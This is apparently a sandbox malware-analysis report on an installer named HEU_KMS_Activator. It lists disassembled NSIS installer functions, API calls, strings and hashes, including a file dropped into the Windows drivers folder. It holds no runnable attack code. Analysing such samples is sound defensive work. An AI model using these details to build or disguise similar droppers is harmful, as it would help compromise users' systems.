    • String ID: C:\Windows\SysNative\drivers\DvLayout.exe$File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"
    • API String ID: 4286501637-800567599
    • Opcode ID: e56eb7d7c5b6bc145d20ff5dbc898ad347418731b7a4ed0a286d93d2c57b5021
    • Instruction ID: 0dbac18d5163ab2b0bf6f932dd3efdd3c4ff5a4e9782b1b471820d854f15f35f
    • Opcode Fuzzy Hash: e56eb7d7c5b6bc145d20ff5dbc898ad347418731b7a4ed0a286d93d2c57b5021
    • Instruction Fuzzy Hash: 4551D471904614BADB107B66DC46EAF3978DF01328B20063FF411B11E2DE7D9A41AFAD
    Function 00403472 Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 205COMMON
    Download Yara Rule

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 565 403472-4034c0 GetTickCount GetModuleFileNameA call 405b31 568 4034c2-4034c7 565->568 569 4034cc-4034fa call 405cc1 call 405fed call 405cc1 GetFileSize 565->569 570 403706-40370a 568->570 577 403500 569->577 578 4035e7-4035f5 call 4030e1 569->578 580 403505-40351c 577->580 585 403682-403687 578->585 586 4035fb-4035fe 578->586 581 403520-403522 call 403180 580->581 582 40351e 580->582 587 403527-403529 581->587 582->581 585->570 588 403600-403611 call 4031b2 call 403180 586->588 589 403622-40366e GlobalAlloc call 40676d call 405b60 CreateFileA 586->589 591 40367a-403681 call 4030e1 587->591 592 40352f-403536 587->592 605 403616-403618 588->605 616 403670-403675 589->616 617 403689-4036b9 call 4031b2 call 403347 589->617 591->585 595 4035b2-4035b6 592->595 596 403538-40354c call 405aed 592->596 600 4035c0-4035c6 595->600 601 4035b8-4035bf call 4030e1 595->601 596->600 614 40354e-403555 596->614 607 4035d5-4035df 600->607 608 4035c8-4035d2 call 4066ff 600->608 601->600 605->585 611 40361a-403620 605->611 607->580 615 4035e5 607->615 608->607 611->585 611->589 614->600 620 403557-40355e 614->620 615->578 616->570 625 4036be-4036c1 617->625 620->600 622 403560-403567 620->622 622->600 624 403569-403570 622->624 624->600 626 403572-403592 624->626 625->585 627 4036c3-4036d4 625->627 626->585 628 403598-40359c 626->628 629 4036d6 627->629 630 4036dc-4036df 627->630 631 4035a4-4035ac 628->631 632 40359e-4035a2 628->632 629->630 634 4036e2-4036ea 630->634 631->600 633 4035ae-4035b0 631->633 632->615 632->631 633->600 634->634 635 4036ec-403704 call 405aed 634->635 635->570
    APIs
    • GetTickCount.KERNEL32 ref: 00403486
    • GetModuleFileNameA.KERNEL32(00000000,0047F000,00002000), ref: 004034A2
      • Part of subcall function 00405B31: GetFileAttributesA.KERNELBASE(00000003,004034B5,0047F000,80000000,00000003), ref: 00405B35
      • Part of subcall function 00405B31: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B57
    • GetFileSize.KERNEL32(00000000,00000000,00481000,00000000,00477000,00477000,0047F000,0047F000,80000000,00000003), ref: 004034EB
    Strings
    • Error launching installer, xrefs: 004034C2
    • Yanu, xrefs: 00403557
    • Null, xrefs: 00403569
    • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://www.ccav1.com, xrefs: 00403682
    • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00403670
    Memory Dump Source
    • Source File: 00000001.00000002.1280341229.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.1280307966.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280376897.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280529774.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280529774.00000000004A2000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_400000_HEU_KMS_Activator.jbxd
    Similarity
    • API ID: File$AttributesCountCreateModuleNameSizeTick
    • String ID: Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://www.ccav1.com$Null$Yanu
    • API String ID: 4283519449-1510984517
    • Opcode ID: 083bb14234767c6b42ee5d60f754b75cb8c714dea4db48c5c12bf051bcf1056b
    • Instruction ID: 70366765bf2586d88c102f1ea9b365f831f717f8dfbc2e26b05df611eadc8c43
    • Opcode Fuzzy Hash: 083bb14234767c6b42ee5d60f754b75cb8c714dea4db48c5c12bf051bcf1056b
    • Instruction Fuzzy Hash: 1F71D671A11208ABDB20AFA5DD85B9E7EACEB04719F10453FF504B72D1EB389E448B5C
    Function 00402380 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 83libraryloaderCOMMON
    Download Yara Rule

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 638 402380-40238c 639 402472-402479 call 401429 638->639 640 402392-4023aa call 401450 * 2 638->640 645 402ef6-402f05 639->645 650 4023ba-4023c9 LoadLibraryExA 640->650 651 4023ac-4023b8 GetModuleHandleA 640->651 652 4023cf-4023df GetProcAddress 650->652 653 402460-402468 call 401429 650->653 651->650 651->652 655 4023e1-4023e7 652->655 656 40241e-402436 call 404d10 call 405eff 652->656 653->639 659 402400-402414 655->659 660 4023e9-4023f5 call 401429 655->660 666 402439-40243c 656->666 663 402419-40241c 659->663 660->666 670 4023f7-4023fe 660->670 663->666 666->645 669 402442-40244c call 403b5e 666->669 669->645 673 402452-40245b FreeLibrary 669->673 670->666 673->645
    APIs
    • GetModuleHandleA.KERNELBASE(00000000), ref: 004023AD
      • Part of subcall function 00404D10: lstrlenA.KERNEL32(0042C9D8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00403158,00000000,?), ref: 00404D49
      • Part of subcall function 00404D10: lstrlenA.KERNEL32(00403158,0042C9D8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00403158,00000000), ref: 00404D59
      • Part of subcall function 00404D10: lstrcatA.KERNEL32(0042C9D8,00403158,00403158,0042C9D8,00000000,00000000,00000000), ref: 00404D6C
      • Part of subcall function 00404D10: SetWindowTextA.USER32(0042C9D8,0042C9D8), ref: 00404D7E
      • Part of subcall function 00404D10: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404DA4
      • Part of subcall function 00404D10: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404DBE
      • Part of subcall function 00404D10: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404DCC
      • Part of subcall function 00405EFF: lstrlenA.KERNEL32(RMDir: RemoveDirectory("C:\Users\user~1\AppData\Local\Temp\nsoB6EE.tmp\"),004066A6,RMDir: RemoveDirectory("%s"),?,?,?), ref: 00405F0B
      • Part of subcall function 00405EFF: wvsprintfA.USER32(69444D52,?,?), ref: 00405F21
    • LoadLibraryExA.KERNELBASE(00000000,?,00000008), ref: 004023BE
    • GetProcAddress.KERNEL32(?,?), ref: 004023D5
    • FreeLibrary.KERNEL32(?,?), ref: 00402455
    Strings
    • Error registering DLL: Could not initialize OLE, xrefs: 00402479
    • Error registering DLL: %s not found in %s, xrefs: 0040242C
    • Error registering DLL: Could not load %s, xrefs: 00402468
    Memory Dump Source
    • Source File: 00000001.00000002.1280341229.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.1280307966.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280376897.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280529774.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280529774.00000000004A2000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_400000_HEU_KMS_Activator.jbxd
    Similarity
    • API ID: MessageSendlstrlen$Library$AddressFreeHandleLoadModuleProcTextWindowlstrcatwvsprintf
    • String ID: Error registering DLL: %s not found in %s$Error registering DLL: Could not initialize OLE$Error registering DLL: Could not load %s
    • API String ID: 3271377537-945480824
    • Opcode ID: ed6fcfdba7cafe0a94d3365c6ccbd1bb076e04d6fd5e81889b96f6e70d872a55
    • Instruction ID: 1385288b8d20bff87df3c13422bfb71b17e426659149a7e30c8991742041c895
    • Opcode Fuzzy Hash: ed6fcfdba7cafe0a94d3365c6ccbd1bb076e04d6fd5e81889b96f6e70d872a55
    • Instruction Fuzzy Hash: 8421A331900119FBCF106FA5CE49A9E7A74AF40358F60813BF911B11E1DBBC4981AAAD
    Function 00402218 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 63synchronizationCOMMON
    Download Yara Rule

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 674 402218-402242 call 401450 call 405eff call 404d10 call 40599a 683 402244-402253 call 405eff 674->683 684 4022ae 674->684 689 402255-402267 WaitForSingleObject 683->689 690 4022a6-4022a9 683->690 685 402a88-402f05 CloseHandle 684->685 692 402277-402279 689->692 690->685 694 402269-402275 call 405f8d WaitForSingleObject 692->694 695 40227b-40228b GetExitCodeProcess 692->695 694->692 697 40229a-40229d 695->697 698 40228d-402298 call 405c1f 695->698 697->690 699 40229f 697->699 698->690 699->690
    APIs
      • Part of subcall function 00405EFF: lstrlenA.KERNEL32(RMDir: RemoveDirectory("C:\Users\user~1\AppData\Local\Temp\nsoB6EE.tmp\"),004066A6,RMDir: RemoveDirectory("%s"),?,?,?), ref: 00405F0B
      • Part of subcall function 00405EFF: wvsprintfA.USER32(69444D52,?,?), ref: 00405F21
      • Part of subcall function 00404D10: lstrlenA.KERNEL32(0042C9D8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00403158,00000000,?), ref: 00404D49
      • Part of subcall function 00404D10: lstrlenA.KERNEL32(00403158,0042C9D8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00403158,00000000), ref: 00404D59
      • Part of subcall function 00404D10: lstrcatA.KERNEL32(0042C9D8,00403158,00403158,0042C9D8,00000000,00000000,00000000), ref: 00404D6C
      • Part of subcall function 00404D10: SetWindowTextA.USER32(0042C9D8,0042C9D8), ref: 00404D7E
      • Part of subcall function 00404D10: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404DA4
      • Part of subcall function 00404D10: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404DBE
      • Part of subcall function 00404D10: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404DCC
      • Part of subcall function 0040599A: CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,0043A9F0,Error launching installer), ref: 004059BF
      • Part of subcall function 0040599A: CloseHandle.KERNEL32(?), ref: 004059CC
    • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402260
    • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00402275
    • GetExitCodeProcess.KERNELBASE(?,?), ref: 00402282
    • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402A88
    Strings
    • Exec: command="%s", xrefs: 00402222
    • Exec: success ("%s"), xrefs: 00402244
    • Exec: failed createprocess ("%s"), xrefs: 004022AE
    Memory Dump Source
    • Source File: 00000001.00000002.1280341229.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.1280307966.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280376897.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280529774.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280529774.00000000004A2000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_400000_HEU_KMS_Activator.jbxd
    Similarity
    • API ID: MessageSendlstrlen$CloseHandleObjectProcessSingleWait$CodeCreateExitTextWindowlstrcatwvsprintf
    • String ID: Exec: command="%s"$Exec: failed createprocess ("%s")$Exec: success ("%s")
    • API String ID: 2917186638-3433828417
    • Opcode ID: e14845f73985f49797aa2f0caa93f007687884ea93ed5360e046f760b186633f
    • Instruction ID: d1dd84156d487da42daeb500d6d6ce361429f128ce4fd5497bfb2c4449ad6cad
    • Opcode Fuzzy Hash: e14845f73985f49797aa2f0caa93f007687884ea93ed5360e046f760b186633f
    • Instruction Fuzzy Hash: D7119D32904215BBDF21AB94DE05AAE7A65EF40314F24003FF601B50E0DBBD4981AB9D
    Function 00403347 Relevance: 7.6, APIs: 5, Instructions: 109fileCOMMON
    Download Yara Rule

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 703 403347-403355 704 403373-40337e call 4031c9 703->704 705 403357-40336d SetFilePointer 703->705 708 403384-40339f ReadFile 704->708 709 40346c-40346f 704->709 705->704 710 4033a5-4033a8 708->710 711 403468 708->711 710->711 713 4033ae-4033c1 call 4031c9 710->713 712 40346a 711->712 715 40346b 712->715 713->715 717 4033c7-4033ca 713->717 715->709 718 403437-40343d 717->718 719 4033cc-4033cf 717->719 722 403442-403455 ReadFile 718->722 723 40343f 718->723 720 403463-403466 719->720 721 4033d5 719->721 720->715 725 4033da-4033e2 721->725 722->711 724 403457-403460 722->724 723->722 724->720 726 4033e4 725->726 727 4033e7-4033f9 ReadFile 725->727 726->727 727->711 728 4033fb-4033fe 727->728 728->711 729 403400-403415 WriteFile 728->729 730 403433-403435 729->730 731 403417-40341a 729->731 730->712 731->730 732 40341c-40342f 731->732 732->725 733 403431 732->733 733->720
    APIs
    • SetFilePointer.KERNELBASE(00408A00,00000000,00000000,00000000,00000000,?,?,?,004036BE,000000FF,00000000,00000000,00408A00,?), ref: 0040336D
    • ReadFile.KERNELBASE(00408A00,00000004,?,00000000,00000000,00000004,00000000,00000000,?,?,?,004036BE,000000FF,00000000,00000000,00408A00), ref: 0040339B
    • ReadFile.KERNEL32(004249A0,00004000,?,00000000,00408A00,?,004036BE,000000FF,00000000,00000000,00408A00,?), ref: 004033F5
    • WriteFile.KERNELBASE(00000000,004249A0,?,000000FF,00000000,?,004036BE,000000FF,00000000,00000000,00408A00,?), ref: 0040340D
    Memory Dump Source
    • Source File: 00000001.00000002.1280341229.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.1280307966.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280376897.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280529774.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280529774.00000000004A2000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_400000_HEU_KMS_Activator.jbxd
    Similarity
    • API ID: File$Read$PointerWrite
    • String ID:
    • API String ID: 2113905535-0
    • Opcode ID: 91c605e64ca6659561e8135185ec2416fc68f3a462b2b945c87f04a878783011
    • Instruction ID: bceff78395468939dd0c808d1ec6cdd6c42f3223bff59829e1ecdaa152765343
    • Opcode Fuzzy Hash: 91c605e64ca6659561e8135185ec2416fc68f3a462b2b945c87f04a878783011
    • Instruction Fuzzy Hash: 81310C71500209FBDB11DFA9DD8499E3BBCEB84762F10403AF905EA190D7349B51DF6A
    Function 004031C9 Relevance: 6.1, APIs: 4, Instructions: 107fileCOMMON
    Download Yara Rule

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 734 4031c9-4031f2 GetTickCount 735 403327-40332f call 4030e1 734->735 736 4031f8-403223 call 4031b2 SetFilePointer 734->736 741 403331-403336 735->741 742 403228-40323a 736->742 743 40323c 742->743 744 40323e-40324c call 403180 742->744 743->744 747 403252-40325e 744->747 748 403339-40333c 744->748 749 403264-40326a 747->749 748->741 750 403295-4032b1 call 40678d 749->750 751 40326c-403272 749->751 757 4032b7-4032bf 750->757 758 40333e 750->758 751->750 752 403274-403294 call 4030e1 751->752 752->750 760 4032c1-4032d7 WriteFile 757->760 761 4032f3-4032f9 757->761 759 403340-403341 758->759 759->741 762 403343-403345 760->762 763 4032d9-4032dd 760->763 761->758 764 4032fb-4032fd 761->764 762->759 763->762 766 4032df-4032eb 763->766 764->758 765 4032ff-403312 764->765 765->742 767 403318-403321 SetFilePointer 765->767 766->749 768 4032f1 766->768 767->735 768->765
    APIs
    • GetTickCount.KERNEL32 ref: 004031DE
      • Part of subcall function 004031B2: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403697,?), ref: 004031C0
    • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,?,0040337C,00000004,00000000,00000000,?,?,?,004036BE,000000FF,00000000,00000000), ref: 00403211
    • WriteFile.KERNELBASE(0041C998,00420A11,000000FF,00000000,004249A0,00004000,?,00000000,?,0040337C,00000004,00000000,00000000,?,?), ref: 004032CF
    • SetFilePointer.KERNELBASE(0084DB7B,00000000,00000000,004249A0,00004000,?,00000000,?,0040337C,00000004,00000000,00000000,?,?,?,004036BE), ref: 00403321
    Memory Dump Source
    • Source File: 00000001.00000002.1280341229.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.1280307966.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280376897.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280529774.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280529774.00000000004A2000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_400000_HEU_KMS_Activator.jbxd
    Similarity
    • API ID: File$Pointer$CountTickWrite
    • String ID:
    • API String ID: 2146148272-0
    • Opcode ID: 1828cd59170ff397b45349681c56fe4c1c6fcc5d3fa48b0b92589d578537bf09
    • Instruction ID: b2f8ff4e9b6a80f0a30b6d88c005429b3a8c67ad6538c0199de23a3900fa6ebd
    • Opcode Fuzzy Hash: 1828cd59170ff397b45349681c56fe4c1c6fcc5d3fa48b0b92589d578537bf09
    • Instruction Fuzzy Hash: 6A4180B26122009FD7209FA9EDC496A7BACFB44356754813FE941B32B0CB3459828B5E
    Function 00406014 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52stringCOMMON
    Download Yara Rule

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 856 406014-40602f call 405cc1 call 405aa0 861 406031-406033 856->861 862 406035-406042 call 405ce3 856->862 863 40608d-40608f 861->863 866 406044-406048 862->866 867 40604e-406057 862->867 866->861 868 40604a-40604c 866->868 869 40606e-406073 lstrlenA 867->869 868->861 868->867 870 406075-40608a call 405fc0 GetFileAttributesA 869->870 871 406059-406061 call 405f2f 869->871 876 40608c 870->876 877 406063-406066 871->877 878 406068-406069 call 405fed 871->878 876->863 877->878 879 406092-406094 877->879 878->869 879->876
    APIs
      • Part of subcall function 00405CC1: lstrcpynA.KERNEL32(?,?,00002000,004037F1,004447E0,NSIS Error), ref: 00405CCE
      • Part of subcall function 00405AA0: CharNextA.USER32(?,?,0043AA38,00000000,0040602B,0043AA38,0043AA38,d@,?,771B2EE0,004064EE,?,00471000), ref: 00405AAE
      • Part of subcall function 00405AA0: CharNextA.USER32(00000000), ref: 00405AB3
      • Part of subcall function 00405AA0: CharNextA.USER32(00000000), ref: 00405AC2
    • lstrlenA.KERNEL32(0043AA38,00000000,00000000,0043AA38,0043AA38,d@,?,771B2EE0,004064EE,?,00471000), ref: 0040606F
    • GetFileAttributesA.KERNELBASE(0043AA38,0043AA38), ref: 0040607C
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.1280341229.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.1280307966.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280376897.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280529774.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280529774.00000000004A2000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_400000_HEU_KMS_Activator.jbxd
    Similarity
    • API ID: CharNext$AttributesFilelstrcpynlstrlen
    • String ID: d@
    • API String ID: 3248276644-2474408879
    • Opcode ID: bcaf0d7691cdc3a64df73085a074f8145fec66e6bfd537306c1045531c4ed0e0
    • Instruction ID: a77b1e27f4d1faccd58aab586ddd3e221e070ef2bbe63c49fb8443b9dbb1e7db
    • Opcode Fuzzy Hash: bcaf0d7691cdc3a64df73085a074f8145fec66e6bfd537306c1045531c4ed0e0
    • Instruction Fuzzy Hash: 24019932189E212AC232E7391D44A9F16488E4732031B013FF883B22C2DF3C8863D47D
    Function 00405B60 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32COMMON
    Download Yara Rule

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 881 405b60-405b6a 882 405b6b-405b95 GetTickCount GetTempFileNameA 881->882 883 405ba4-405ba6 882->883 884 405b97-405b99 882->884 886 405b9e-405ba1 883->886 884->882 885 405b9b 884->885 885->886
    APIs
    • GetTickCount.KERNEL32 ref: 00405B73
    • GetTempFileNameA.KERNELBASE(?,0061736E,00000000,?), ref: 00405B8D
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.1280341229.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.1280307966.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280376897.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280529774.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280529774.00000000004A2000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_400000_HEU_KMS_Activator.jbxd
    Similarity
    • API ID: CountFileNameTempTick
    • String ID: nsa
    • API String ID: 1716503409-2209301699
    • Opcode ID: a348680a837ea999b075ed4ef4356b5aef79b087ea15add63ab907e66e05d6f0
    • Instruction ID: 1c5c580aea003068fec851850bf601215df114f532dbf697d95cc27281a0d744
    • Opcode Fuzzy Hash: a348680a837ea999b075ed4ef4356b5aef79b087ea15add63ab907e66e05d6f0
    • Instruction Fuzzy Hash: 24F02732304608B7DB108E19DC04BCB3F6DEF81760F04C02BFA48DE180C6B0A54887A8
    Function 0040599A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
    Download Yara Rule

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 887 40599a-4059c7 CreateProcessA 888 4059d5-4059d6 887->888 889 4059c9-4059d2 CloseHandle 887->889 889->888
    APIs
    • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,0043A9F0,Error launching installer), ref: 004059BF
    • CloseHandle.KERNEL32(?), ref: 004059CC
    Strings
    • Error launching installer, xrefs: 004059A3
    Memory Dump Source
    • Source File: 00000001.00000002.1280341229.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.1280307966.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280376897.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280529774.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280529774.00000000004A2000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_400000_HEU_KMS_Activator.jbxd
    Similarity
    • API ID: CloseCreateHandleProcess
    • String ID: Error launching installer
    • API String ID: 3712363035-66219284
    • Opcode ID: 6c7a91aee1a4036bac63fdeca69de76944c5f85f0703b9806011348b8f00e617
    • Instruction ID: 6241f6bbb51e443f6774ee81d471fc13e6e7e102c01ef3b2fb3be9e778194d77
    • Opcode Fuzzy Hash: 6c7a91aee1a4036bac63fdeca69de76944c5f85f0703b9806011348b8f00e617
    • Instruction Fuzzy Hash: 3FE0ECB1500209ABEB009B64DD09E7B7BBCFB04305F028926A951F2150E774D8148AA9
    Function 00406D40 Relevance: 5.2, APIs: 4, Instructions: 237COMMON
    Download Yara Rule
    Memory Dump Source
    • Source File: 00000001.00000002.1280341229.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.1280307966.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280376897.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280529774.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280529774.00000000004A2000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_400000_HEU_KMS_Activator.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: d13314cf579c055acdd9b40a44d41c686428c469462516e78ca20b73e45bcba1
    • Instruction ID: 266b5070f8f2f8198caed7b896c680d4be930a4649085d9ae75a31da77d815f9
    • Opcode Fuzzy Hash: d13314cf579c055acdd9b40a44d41c686428c469462516e78ca20b73e45bcba1
    • Instruction Fuzzy Hash: A9A15571904248EBDF18CF29C8946E93BB1FF44355F11812AFC5AAB281D738E985CF89
